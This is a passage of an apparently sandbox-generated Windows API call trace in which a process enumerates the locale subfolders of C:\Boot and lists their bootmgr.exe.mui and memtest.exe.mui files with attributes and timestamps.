lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0197.202] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604478 [0197.203] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.203] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.203] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.203] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.203] FindClose (in: hFindFile=0x604478 | out: hFindFile=0x604478) returned 1 [0197.203] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.203] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0197.203] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6047f8 [0197.204] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.204] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.204] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.205] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.205] FindClose (in: hFindFile=0x6047f8 | out: hFindFile=0x6047f8) returned 1 [0197.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.205] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0197.205] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0197.205] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.205] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.205] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.206] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.206] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0197.206] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.206] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0197.206] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.207] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.207] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.207] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.207] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.207] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.207] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.207] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0197.207] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604438 [0197.208] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.208] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.208] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.209] FindClose (in: hFindFile=0x604438 | out: hFindFile=0x604438) returned 1 [0197.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.209] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0197.209] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045f8 [0197.209] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.209] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.209] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.209] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.209] FindClose (in: hFindFile=0x6045f8 | out: hFindFile=0x6045f8) returned 1 [0197.210] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.210] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0197.210] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0197.211] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.211] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.211] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.211] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.211] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0197.211] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.211] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0197.211] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604678 [0197.212] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.212] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, 